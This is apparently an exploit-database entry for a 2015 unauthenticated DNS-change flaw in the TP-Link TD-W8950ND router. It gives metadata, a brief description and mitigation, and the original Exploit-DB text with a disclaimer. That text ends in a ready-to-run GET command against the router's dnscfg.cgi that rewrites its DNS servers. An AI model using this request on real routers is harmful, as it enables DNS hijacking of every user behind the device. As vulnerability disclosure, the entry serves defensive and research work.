TP-Link ADSL2+ TD-W8950ND Unauthenticated Remote DNS Change

vendor:

TD-W8950ND

by:

Todor Donev

7.8

CVSS

HIGH

Unauthenticated Remote DNS Change

287

CWE

Product Name: TD-W8950ND

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: h:tp-link:td-w8950nd

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2015

TP-Link ADSL2+ TD-W8950ND Unauthenticated Remote DNS Change

This exploit allows an attacker to change the DNS settings of a TP-Link ADSL2+ TD-W8950ND router without authentication. The exploit is achieved by sending a GET request to the router's dnscfg.cgi page with the desired DNS settings as parameters.

Mitigation:

Ensure that all routers are configured with strong authentication and that all users are aware of the importance of not sharing their credentials.

Source

Exploit-DB raw data:

  TP-Link ADSL2+ TD-W8950ND 
  Unauthenticated Remote DNS Change

  Copyright 2015 (c) Todor Donev 
  <todor.donev at gmail.com>
  http://www.ethical-hacker.org/
  https://www.facebook.com/ethicalhackerorg

  No description for morons, 
  script kiddies & noobs !!

  Disclaimer:
  This or previous programs is for Educational
  purpose ONLY. Do not use it without permission.
  The usual disclaimer applies, especially the
  fact that Todor Donev is not liable for any
  damages caused by direct or indirect use of the
  information or functionality provided by these
  programs. The author or any Internet provider
  bears NO responsibility for content or misuse
  of these programs or any derivatives thereof.
  By using these programs you accept the fact
  that any damage (dataloss, system crash,
  system compromise, etc.) caused by the use
  of these programs is not Todor Donev's
  responsibility.
  
  Use them at your own risk!


[todor@adamantium ~]$ GET "http://TARGET/dnscfg.cgi?dnsPrimary=8.8.8.8&dnsDynamic=0&dnsRefresh=1" 0&> /dev/null <&1